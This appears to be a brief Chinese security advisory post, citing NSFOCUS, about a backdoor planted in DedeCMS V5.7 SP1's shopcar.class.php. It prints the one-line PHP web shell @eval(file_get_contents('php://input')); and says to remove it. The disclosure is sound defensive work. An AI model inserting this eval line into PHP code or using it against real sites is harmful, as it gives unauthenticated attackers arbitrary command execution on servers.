DEDECMS是织梦内容管理系统,国内一款基于PHP+MySQL的技术开发的,支持多种服务器平台的PHP网站内容管理系统。
DedeCMS某些版本/include/shopcar.class.php文件中,被添加后门代码,远程未验证的攻击者利用该后门可以执行任意命令。
DedeCMS V5.7 SP1正式版
UTF-8 GBK版本疑似被植入一句话后门
shopcar.class.php被植入一句话@eval(file_get_contents(‘php://input’));
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
*直接找到站点include目录下shopcar.class.php文件,去掉里面的代码
@eval(file_get_contents(‘php://input’));即可。
http://www.wooyun.org/bugs/wooyun-2010-05416
No Responses (yet)
Stay in touch with the conversation, subscribe to the RSS feed for comments on this post.